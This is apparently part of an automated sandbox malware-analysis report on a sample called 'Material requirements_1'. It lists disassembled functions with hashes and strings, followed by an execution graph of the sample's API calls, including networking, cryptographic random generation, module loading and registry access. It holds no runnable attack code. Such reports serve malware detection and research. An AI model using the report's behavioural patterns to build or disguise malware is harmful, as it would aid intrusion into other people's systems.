                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction ID: 8634b204f79b4fdc34461e048424d6e5abd26eb9db41a0714523fd1ab1391996
                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction Fuzzy Hash: CB11BB75604280DFDB12CF54C5C4B15BFB1FB84228F28C6A9D8894B29AC33AD44ACB62

                        Non-executed Functions

                        Function 071232E0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: XK$,0
                        • API String ID: 0-3597542875
                        • Opcode ID: d0615cff7a568eeb6cd4b6a3a14c154879fb1c26cb920ae5b4734bd2006075ad
                        • Instruction ID: 6f225058cfd91bbb20d8785b093c28250cfe49e363875ecc07f35732896d037d
                        • Opcode Fuzzy Hash: d0615cff7a568eeb6cd4b6a3a14c154879fb1c26cb920ae5b4734bd2006075ad
                        • Instruction Fuzzy Hash: 3F5181B052D609EBDB08CF50F086058BFB5F785301F518895D4D5D2298DB79DBB6D704
                        Function 071232DB Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: XK$,0
                        • API String ID: 0-3597542875
                        • Opcode ID: 431b5619579bf7b4f97c7d9642016c416bea83a52a0e7420bf034f51f65cd0b9
                        • Instruction ID: c270115575daccd16abaf464804a6db5334db1dedb1fbb50f31efb690bb10512
                        • Opcode Fuzzy Hash: 431b5619579bf7b4f97c7d9642016c416bea83a52a0e7420bf034f51f65cd0b9
                        • Instruction Fuzzy Hash: 085181B092D609EBDB08CF50F086058BFB5FB85301F518895D8D4D2298DB79DBBAD704
                        Function 07126DE0 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: O5>M
                        • API String ID: 0-2302383708
                        • Opcode ID: f371c655d2a9b049fbf9da1a8ca267803e7adb390d1048c49370b0d4361a32f0
                        • Instruction ID: f219ef18376f1367b8c852cf54b6e246470e005081d0668fb2a1f49af9f1a374
                        • Opcode Fuzzy Hash: f371c655d2a9b049fbf9da1a8ca267803e7adb390d1048c49370b0d4361a32f0
                        • Instruction Fuzzy Hash: 19B129B1E15269DFCB08CFA9D98089EFBB2FF89300F14D52AD415BB294D73499029F64
                        Function 07126DD1 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: O5>M
                        • API String ID: 0-2302383708
                        • Opcode ID: 2755108e88791cfdafa78affc334e16076f5b0b211b7e3170af1f5cf07264354
                        • Instruction ID: 22072da9f127dcd9bd48012ffaa221c1111270dda4d9a22749e886321ed1bb1d
                        • Opcode Fuzzy Hash: 2755108e88791cfdafa78affc334e16076f5b0b211b7e3170af1f5cf07264354
                        • Instruction Fuzzy Hash: 36B119B1E15259DFCB08CFA9D98089EFBB2FF89300F14D526D415BB294D73099129F64
                        Function 071254F8 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: nlh_
                        • API String ID: 0-3984638114
                        • Opcode ID: 1ac4ebeb5ae12c741e7c3576d54694cb1b0be14bea6f599ed0102c6037fcbe79
                        • Instruction ID: 634349f933d5e0365cb6f83164e86a87d56f6d989f439709e4cb2bf60b79b49c
                        • Opcode Fuzzy Hash: 1ac4ebeb5ae12c741e7c3576d54694cb1b0be14bea6f599ed0102c6037fcbe79
                        • Instruction Fuzzy Hash: B85130B4E15219DBCB08CFA9D4815AEFBB3AF89300F10946AE415B7254D7349A62CF90
                        Function 07125508 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: nlh_
                        • API String ID: 0-3984638114
                        • Opcode ID: 8938f5668990771cb18783ff14d785885ad27f702bd89be56ba5d8f40d862a0f
                        • Instruction ID: 91fb9d817982b811e3ebafe9e57c901e22f4480914087f8fa69b64e946bd16b9
                        • Opcode Fuzzy Hash: 8938f5668990771cb18783ff14d785885ad27f702bd89be56ba5d8f40d862a0f
                        • Instruction Fuzzy Hash: 85513EB4E15219DBCB08CFAAD4855AEFBF3AF89300F10942AE415F7254D7349A62CF94
                        Function 07123070 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: f:
                        • API String ID: 0-2393945263
                        • Opcode ID: e28040f858de5463376f649c388c5254884eabf7dfcbc71057f9bb8878167c57
                        • Instruction ID: 79153fcd849b1b61fb72eaaba0f17a1f371223a0b4a174117197a1bb9aaaa59a
                        • Opcode Fuzzy Hash: e28040f858de5463376f649c388c5254884eabf7dfcbc71057f9bb8878167c57
                        • Instruction Fuzzy Hash: 0E4129B0E1521A9FCB08CFAAC4415EEFBF2BF89300F14C42AC415A7255D7389A52CFA5
                        Function 07123080 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: f:
                        • API String ID: 0-2393945263
                        • Opcode ID: 765285c38fdef9d30e5667658dd5c70ca7d921b60764cb0504aaf6312e03c4ae
                        • Instruction ID: cc61ccd86ca16118a5f36500d6c150a5e19f1c3a8e1d885659fb5cd87ea7f61d
                        • Opcode Fuzzy Hash: 765285c38fdef9d30e5667658dd5c70ca7d921b60764cb0504aaf6312e03c4ae
                        • Instruction Fuzzy Hash: C641F8B0E1121A9BCB08CFAAC4415EEFBF2BF89300F14C42AC415B7254D7389A52DFA5
                        Function 04DA3DF0 Relevance: .4, Instructions: 426COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c80f2f5997ef8a7d577987b82d74c7c1ed80dbcf532e4414d2b343c97280d8f0
                        • Instruction ID: 1f30ea6c22dfdb2e693dabb293ebb1fc5bd6402db9c1c9eb9cd4bb961a1bca6b
                        • Opcode Fuzzy Hash: c80f2f5997ef8a7d577987b82d74c7c1ed80dbcf532e4414d2b343c97280d8f0
                        • Instruction Fuzzy Hash: 58E187317017108BDB29EB79C4A07AEB7F7AFC9704F148469D54A9B3A0DB35E802CB61
                        Function 05320040 Relevance: .3, Instructions: 315COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0473e21901363035544fe841758a51370e5e6e2ef723a8224eb36862b80071eb
                        • Instruction ID: 47bed6d419df87dae38a1555c3b6ed2630299191fc749a035ea81f628531f8d4
                        • Opcode Fuzzy Hash: 0473e21901363035544fe841758a51370e5e6e2ef723a8224eb36862b80071eb
                        • Instruction Fuzzy Hash: E612A5B8C81746CBD710CF65F84C1893BF1BBA1318BD04A19D2616B3E5DBB91A6ACF44
                        Function 04DA0040 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088025085.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4da0000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c46ce61b8f9348610b051bd6acddb084a3369a2e4ae9e5312c26902430c999ab
                        • Instruction ID: f8d0672a6de9fc8de74a7c687597b7608f5f6f49d5bb48ba59a975e6c38be4d7
                        • Opcode Fuzzy Hash: c46ce61b8f9348610b051bd6acddb084a3369a2e4ae9e5312c26902430c999ab
                        • Instruction Fuzzy Hash: 01E1F774E002198FCB15DFA9C5809AEFBF2FF89305F248569D418AB356D731A981CFA1
                        Function 0712F650 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b618e52f266a5cc8b03221e8c45d044baf48833017b3ac2148df5c0255cd3a5d
                        • Instruction ID: f66fdbb969d1f068814b79eda62602214a4566d8f4caf95f35ab32ea8eb2c775
                        • Opcode Fuzzy Hash: b618e52f266a5cc8b03221e8c45d044baf48833017b3ac2148df5c0255cd3a5d
                        • Instruction Fuzzy Hash: 2DE10BB4E001198FCB14DFA9C5909AEFBF6FF89305F248169E418AB356D731A942CF61
                        Function 0712DFA8 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e72e100da3daaa97a88ef7c19300f53417f98a7758612c8d5765fb902520c4f0
                        • Instruction ID: 96bc6f01a40b04333552752cd9b79c7f8243ae6fa10e63fc55a96f58cc45a618
                        • Opcode Fuzzy Hash: e72e100da3daaa97a88ef7c19300f53417f98a7758612c8d5765fb902520c4f0
                        • Instruction Fuzzy Hash: 14E11BB4E002298FCB14DFA9C5849AEFBF2FF89305F248169D414AB356D731A942CF61
                        Function 0712DB70 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37dcc4ee6cb3f7f16683b5a086d73f3f2f3915b7f751ba3020366d08bbb0c932
                        • Instruction ID: 37ffd662ecaaff20fdc2d4fba843585a6e84173960ff2580c560dee58586c262
                        • Opcode Fuzzy Hash: 37dcc4ee6cb3f7f16683b5a086d73f3f2f3915b7f751ba3020366d08bbb0c932
                        • Instruction Fuzzy Hash: 00E11AB4E001298FCB14DFA8D5809AEFBF2FF89305F248169D458AB356D731A942DF61
                        Function 02D0D5BC Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2083691334.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31c3ff5076db8dd1566834f5d93cae258d2274e6ba198f06e975b56722043c1b
                        • Instruction ID: 457fe407b895eeb363e1d52ce21c3b26ab2f65195247f415200f10be7f503fdb
                        • Opcode Fuzzy Hash: 31c3ff5076db8dd1566834f5d93cae258d2274e6ba198f06e975b56722043c1b
                        • Instruction Fuzzy Hash: 60A13936E002058FCF15DFA4C8846AEB7B2FF85304B25856AE805AB3A5DF71ED15CB90
                        Function 05320006 Relevance: .2, Instructions: 236COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92bef1d4f2d1a8da7703409a4b7921e3fc5d12f54bdff7da098167d9312f6972
                        • Instruction ID: eb48945270a832c46e5164f35874d41561e2b24ef23638118573db8cfdf7ef0f
                        • Opcode Fuzzy Hash: 92bef1d4f2d1a8da7703409a4b7921e3fc5d12f54bdff7da098167d9312f6972
                        • Instruction Fuzzy Hash: 77C146B9C807468BD711CF25F8481897BF1BFA1328F944B19D1616B3E1DBB819AACF44
                        Function 07121E10 Relevance: .2, Instructions: 190COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 57cd174528c07265fdd746cf9c13455cb4f1bd01e8584461c18ccff90b777a87
                        • Instruction ID: 57cd1b1fb3018325794b7f83c0e91677b599a176a4f3a3dd9be965038f75f366
                        • Opcode Fuzzy Hash: 57cd174528c07265fdd746cf9c13455cb4f1bd01e8584461c18ccff90b777a87
                        • Instruction Fuzzy Hash: 658133B4A14219EFCB04CFA9D98089EFBF2FF89210F118529D419BB360D330AA52DF51
                        Function 07121E00 Relevance: .2, Instructions: 184COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 99348c54f76fb401a184d76e6243264e8a3b5d6eabb63e9a87a6aa22b6eed1b9
                        • Instruction ID: 8edc970d115d225ba36797440ff526e8affa3e5acd2ccab8e00e1237887becbb
                        • Opcode Fuzzy Hash: 99348c54f76fb401a184d76e6243264e8a3b5d6eabb63e9a87a6aa22b6eed1b9
                        • Instruction Fuzzy Hash: 138114B4A11219EFCB04CFA9D98099EFBF2FF89210F158566D419B7350D330AA52DF51
                        Function 07122CD8 Relevance: .2, Instructions: 153COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 722fde2512ca73c3568b202c5073428dcdf81360a307353ff9164d99b52c9cc6
                        • Instruction ID: 5a0c2a660b88edfa0f257aa48eef8c07e9bd3308f53d3e9f0888ab5c751eaa4d
                        • Opcode Fuzzy Hash: 722fde2512ca73c3568b202c5073428dcdf81360a307353ff9164d99b52c9cc6
                        • Instruction Fuzzy Hash: BF6144B5E0421E9FCB04CFAAD5805EEBBB2FF8A300F11951AD411B7240D734AA52DF90
                        Function 07122CC9 Relevance: .1, Instructions: 144COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: efe595aec194ab055ac7743c1ac522cb838910b5896c1842d83b962d0415eb67
                        • Instruction ID: d12c2ca03b33050344d88a8b1f91787a2f23b60fce0fff31e45d30537dcf905a
                        • Opcode Fuzzy Hash: efe595aec194ab055ac7743c1ac522cb838910b5896c1842d83b962d0415eb67
                        • Instruction Fuzzy Hash: 6A5157B5E0421E9FCB04CFA9D5805AEFBB2FF8A300F15852AD410B7244D738AA52DF90
                        Function 0712DB60 Relevance: .1, Instructions: 133COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2dae58ac02cff73ed000e922e277579dc7021f55ba034b9854ff80def50cc11b
                        • Instruction ID: aa60ccb3f47b3696318d1f809185b3e18ae74b061003fb5fdbf4f55f3c9ab61f
                        • Opcode Fuzzy Hash: 2dae58ac02cff73ed000e922e277579dc7021f55ba034b9854ff80def50cc11b
                        • Instruction Fuzzy Hash: 8A5128B4E102198FDB14CFA9D5805AEBBF2FF89305F24C169D458A7356D7309A42CFA1
                        Function 0712F641 Relevance: .1, Instructions: 128COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e76c3e656a86078e022a183833f24b4ea19e1ebfad2ef04c5f99cde9021ddf5
                        • Instruction ID: 3ee49ea8719ad3ca785649a91e85358f0816af2069ebb13c06a152b1b07bb482
                        • Opcode Fuzzy Hash: 2e76c3e656a86078e022a183833f24b4ea19e1ebfad2ef04c5f99cde9021ddf5
                        • Instruction Fuzzy Hash: 535118B5E002198FDB14DFA9C5805AEBBF6FF89305F24C16AD418A7356D7309A42CFA0
                        Function 05323F54 Relevance: .1, Instructions: 105COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f843dd2a537d3019b9256a9ce4894a5ddc4cbd1924db784b81804ed90f670e
                        • Instruction ID: d5a146eddc92edd4159ce475aed57a6323244c864ed7c79939f5a277b262e43f
                        • Opcode Fuzzy Hash: f5f843dd2a537d3019b9256a9ce4894a5ddc4cbd1924db784b81804ed90f670e
                        • Instruction Fuzzy Hash: 4B4103B5918BA58FCB118F78E4857A6BFF1EB16300F58889AC4888B312D6789446CB51

                        Execution Graph

                        Execution Coverage:3%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:5.7%
                        Total number of Nodes:1062
                        Total number of Limit Nodes:60
                        execution_graph 46613 41d4e0 46614 41d4f6 _Yarn ___scrt_fastfail 46613->46614 46616 431fa9 21 API calls 46614->46616 46628 41d6f3 46614->46628 46619 41d6a6 ___scrt_fastfail 46616->46619 46617 41d704 46622 41d744 46617->46622 46626 41d770 46617->46626 46630 431fa9 46617->46630 46621 431fa9 21 API calls 46619->46621 46619->46622 46625 41d6ce ___scrt_fastfail 46621->46625 46623 41d73d ___scrt_fastfail 46623->46622 46635 43265f 46623->46635 46625->46622 46627 431fa9 21 API calls 46625->46627 46626->46622 46638 41d484 21 API calls ___scrt_fastfail 46626->46638 46627->46628 46628->46622 46629 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46628->46629 46629->46617 46631 431fb3 46630->46631 46632 431fb7 46630->46632 46631->46623 46639 43a89c 46632->46639 46648 43257f 46635->46648 46637 432667 46637->46626 46638->46622 46641 446b0f _strftime 46639->46641 46640 446b4d 46647 445364 20 API calls _abort 46640->46647 46641->46640 46642 446b38 RtlAllocateHeap 46641->46642 46646 442210 7 API calls 2 library calls 46641->46646 46642->46641 46644 431fbc 46642->46644 46644->46623 46646->46641 46647->46644 46649 432598 46648->46649 46653 43258e 46648->46653 46650 431fa9 21 API calls 46649->46650 46649->46653 46651 4325b9 46650->46651 46651->46653 46654 43294a CryptAcquireContextA 46651->46654 46653->46637 46655 43296b CryptGenRandom 46654->46655 46657 432966 46654->46657 46656 432980 CryptReleaseContext 46655->46656 46655->46657 46656->46657 46657->46653 46658 42c5e3 46659 42c5fb ___scrt_fastfail 46658->46659 46667 42c6a1 46658->46667 46661 42c647 46659->46661 46659->46667 46668 42c841 21 API calls ___scrt_fastfail 46659->46668 46669 42c841 21 API calls ___scrt_fastfail 46661->46669 46663 42c64c 46663->46667 46670 42c523 21 API calls 46663->46670 46666 42c666 46666->46667 46671 42c05a 46666->46671 46668->46659 46669->46663 46670->46666 46673 42c074 46671->46673 46672 42c0b4 46680 42c143 46672->46680 46683 42bf8b 46672->46683 46673->46672 46682 42babe 21 API calls 46673->46682 46676 42c4e4 46676->46667 46677 42c110 46678 42bf8b 24 API calls 46677->46678 46677->46680 46678->46680 46680->46676 46696 42b537 21 API calls 46680->46696 46697 42babe 21 API calls 46680->46697 46682->46672 46698 42cbba 46683->46698 46685 42bf9e 46688 42bfb3 46685->46688 46703 430c12 21 API calls 46685->46703 46687 42c040 46687->46677 46688->46687 46704 430be5 21 API calls 46688->46704 46690 42bfdd 46690->46687 46705 430c12 21 API calls 46690->46705 46692 42bfff 46692->46687 46706 430c12 21 API calls 46692->46706 46694 42c01f 46694->46687 46707 430c12 21 API calls 46694->46707 46696->46680 46697->46680 46708 43266b CryptAcquireContextA CryptGenRandom CryptReleaseContext 46698->46708 46700 42cc04 46700->46685 46701 42cbce 46701->46700 46709 42f86f 21 API calls 46701->46709 46703->46688 46704->46690 46705->46692 46706->46694 46707->46687 46708->46701 46709->46700 46710 426040 46715 426107 recv 46710->46715 46716 44e8c6 46717 44e8d1 46716->46717 46718 44e8ea 46717->46718 46719 44e8f9 46717->46719 46737 445364 20 API calls _abort 46718->46737 46720 44e908 46719->46720 46738 455583 27 API calls 2 library calls 46719->46738 46725 44b9ce 46720->46725 46724 44e8ef ___scrt_fastfail 46726 44b9e6 46725->46726 46727 44b9db 46725->46727 46729 44b9ee 46726->46729 46736 44b9f7 _strftime 46726->46736 46739 446b0f 46727->46739 46746 446ad5 20 API calls _free 46729->46746 46730 44ba21 RtlReAllocateHeap 46734 44b9e3 46730->46734 46730->46736 46731 44b9fc 46747 445364 20 API calls _abort 46731->46747 46734->46724 46736->46730 46736->46731 46748 442210 7 API calls 2 library calls 46736->46748 46737->46724 46738->46720 46740 446b4d 46739->46740 46744 446b1d _strftime 46739->46744 46750 445364 20 API calls _abort 46740->46750 46741 446b38 RtlAllocateHeap 46743 446b4b 46741->46743 46741->46744 46743->46734 46744->46740 46744->46741 46749 442210 7 API calls 2 library calls 46744->46749 46746->46734 46747->46734 46748->46736 46749->46744 46750->46743 46751 4260a1 46756 42611e send 46751->46756 46757 43a9a8 46759 43a9b4 _swprintf ___scrt_is_nonwritable_in_current_image 46757->46759 46758 43a9c2 46775 445364 20 API calls _abort 46758->46775 46759->46758 46763 43a9ec 46759->46763 46761 43a9c7 46776 43a837 26 API calls _Deallocate 46761->46776 46770 444adc EnterCriticalSection 46763->46770 46765 43a9f7 46771 43aa98 46765->46771 46768 43a9d2 __fread_nolock 46770->46765 46773 43aaa6 46771->46773 46772 43aa02 46777 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 46772->46777 46773->46772 46778 448426 39 API calls 2 library calls 46773->46778 46775->46761 46776->46768 46777->46768 46778->46773 46779 402bcc 46780 402bd7 46779->46780 46782 402bdf 46779->46782 46797 403315 28 API calls _Deallocate 46780->46797 46783 402beb 46782->46783 46787 4015d3 46782->46787 46784 402bdd 46789 43361d 46787->46789 46788 43a89c _Yarn 21 API calls 46788->46789 46789->46788 46790 402be9 46789->46790 46793 43363e std::_Facet_Register 46789->46793 46798 442210 7 API calls 2 library calls 46789->46798 46792 433dfc std::_Facet_Register 46800 437be7 RaiseException 46792->46800 46793->46792 46799 437be7 RaiseException 46793->46799 46796 433e19 46797->46784 46798->46789 46799->46792 46800->46796 46801 4339ce 46802 4339da ___scrt_is_nonwritable_in_current_image 46801->46802 46833 4336c3 46802->46833 46804 4339e1 46805 433b34 46804->46805 46808 433a0b 46804->46808 47133 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46805->47133 46807 433b3b 47134 4426ce 28 API calls _abort 46807->47134 46818 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46808->46818 47127 4434e1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46808->47127 46810 433b41 47135 442680 28 API calls _abort 46810->47135 46813 433a24 46815 433a2a 46813->46815 47128 443485 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46813->47128 46814 433b49 46817 433aab 46844 433c6e 46817->46844 46818->46817 47129 43ee04 38 API calls 2 library calls 46818->47129 46827 433acd 46827->46807 46828 433ad1 46827->46828 46829 433ada 46828->46829 47131 442671 28 API calls _abort 46828->47131 47132 433852 13 API calls 2 library calls 46829->47132 46832 433ae2 46832->46815 46834 4336cc 46833->46834 47136 433e1a IsProcessorFeaturePresent 46834->47136 46836 4336d8 47137 4379fe 10 API calls 3 library calls 46836->47137 46838 4336dd 46843 4336e1 46838->46843 47138 44336e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46838->47138 46840 4336ea 46841 4336f8 46840->46841 47139 437a27 8 API calls 3 library calls 46840->47139 46841->46804 46843->46804 47140 436060 46844->47140 46847 433ab1 46848 443432 46847->46848 47142 44ddd9 46848->47142 46850 44343b 46851 433aba 46850->46851 47146 44e0e3 38 API calls 46850->47146 46853 40d767 46851->46853 47148 41bcf3 LoadLibraryA GetProcAddress 46853->47148 46855 40d783 GetModuleFileNameW 47153 40e168 46855->47153 46857 40d79f 47168 401fbd 46857->47168 46860 401fbd 28 API calls 46861 40d7bd 46860->46861 47172 41afd3 46861->47172 46865 40d7cf 47197 401d8c 46865->47197 46867 40d7d8 46868 40d835 46867->46868 46869 40d7eb 46867->46869 47203 401d64 46868->47203 47454 40e986 111 API calls 46869->47454 46872 40d7fd 46874 401d64 28 API calls 46872->46874 46873 40d845 46875 401d64 28 API calls 46873->46875 46878 40d809 46874->46878 46876 40d864 46875->46876 47208 404cbf 46876->47208 47455 40e937 68 API calls 46878->47455 46879 40d873 47212 405ce6 46879->47212 46882 40d87f 47215 401eef 46882->47215 46883 40d824 47456 40e155 68 API calls 46883->47456 46886 40d88b 47219 401eea 46886->47219 46888 40d894 46890 401eea 26 API calls 46888->46890 46889 401eea 26 API calls 46891 40dc9f 46889->46891 46892 40d89d 46890->46892 47130 433ca4 GetModuleHandleW 46891->47130 46893 401d64 28 API calls 46892->46893 46894 40d8a6 46893->46894 47223 401ebd 46894->47223 46896 40d8b1 46897 401d64 28 API calls 46896->46897 46898 40d8ca 46897->46898 46899 401d64 28 API calls 46898->46899 46901 40d8e5 46899->46901 46900 40d946 46902 401d64 28 API calls 46900->46902 46917 40e134 46900->46917 46901->46900 47457 4085b4 46901->47457 46909 40d95d 46902->46909 46904 40d912 46905 401eef 26 API calls 46904->46905 46906 40d91e 46905->46906 46907 401eea 26 API calls 46906->46907 46910 40d927 46907->46910 46908 40d9a4 47227 40bed7 46908->47227 46909->46908 46914 4124b7 3 API calls 46909->46914 47461 4124b7 RegOpenKeyExA 46910->47461 